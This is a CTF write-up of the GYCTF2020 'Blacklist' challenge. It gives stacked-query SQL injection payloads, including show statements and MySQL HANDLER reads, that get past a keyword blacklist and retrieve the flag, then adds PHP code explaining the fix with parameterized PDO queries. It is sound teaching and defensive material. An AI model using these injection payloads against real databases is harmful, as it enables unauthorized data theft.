[GYCTF2020]Blacklist - stacked queries - BUU practice notes

Start the challenge; the front page shows "Black list is so weak for you, isn't it".

Type a few keywords at random, e.g. select: the page reveals the whole blacklist itself, which saved me the fuzzing run I had planned.

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

Union injection is out, so try stacked queries instead; CTFs clearly love this type of challenge!

First dump the databases: 1';show databases;

array(1) {
  [0]=>
  string(11) "ctftraining"
}
array(1) {
  [0]=>
  string(18) "information_schema"
}
array(1) {
  [0]=>
  string(5) "mysql"
}
array(1) {
  [0]=>
  string(18) "performance_schema"
}
array(1) {
  [0]=>
  string(9) "supersqli"
}
array(1) {
  [0]=>
  string(4) "test"
}

Next dump the table names: 1';show tables;

array(1) {
  [0]=>
  string(8) "FlagHere"
}
array(1) {
  [0]=>
  string(5) "words"
}

Then query the column information: 1';show columns from FlagHere;

array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

Now for the key part. In MySQL:

  1. handler <table> open opens a table
  2. handler <table> read <which row> then reads data from that table
  3. handler <table> close closes it again

So from the information gathered so far the payload can be constructed as:

1';
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;

array(1) {
  [0]=>
  string(42) "flag{bc0dd949-5b62-41c7-85c5-95662641a510}"
}

The flag obtained is flag{bc0dd949-5b62-41c7-85c5-95662641a510}
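The blacklist fails because it only names keywords; show and handler are not on it, and a quoted value spliced into SQL text still ends the statement wherever the quote lands. The durable fix is a parameterized query with multi-statement execution disabled. Added example (not the challenge's own source): the page's filter as a function next to a hardened lookup; the PDO connection, the words table and its id column are assumed, since the page never shows the query the input lands in.

```php
<?php
// Added example for the writeup above, not the challenge's own code.
// Assumed: a PDO/MySQL connection and a `words` table with an `id` column.

// The original check, as shown in the writeup. It only rejects the listed
// keywords, so "show databases" or "handler FlagHere read first" pass it.
function blacklist_blocks(string $inject): bool
{
    return (bool) preg_match(
        '/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i',
        $inject
    );
}

// Hardened connection: real server-side prepares, and the driver refuses to
// run a second statement stacked after a ';' in the query text.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_EMULATE_PREPARES       => false,
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Hardened lookup: the user value travels as a bound parameter and never
// becomes part of the SQL string, so a quote in it cannot end the statement.
function lookup_word(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT * FROM words WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Which inputs the keyword filter lets through (constructed from the
// payloads in the writeup); with the hardened lookup this check is moot.
function filter_verdicts(array $inputs): array
{
    $out = [];
    foreach ($inputs as $p) {
        $out[$p] = blacklist_blocks($p) ? 'blocked' : 'allowed';
    }
    return $out;
}

print_r(filter_verdicts([
    "1';show databases;",
    "1'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;",
    "1' union select 1",
]));
```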
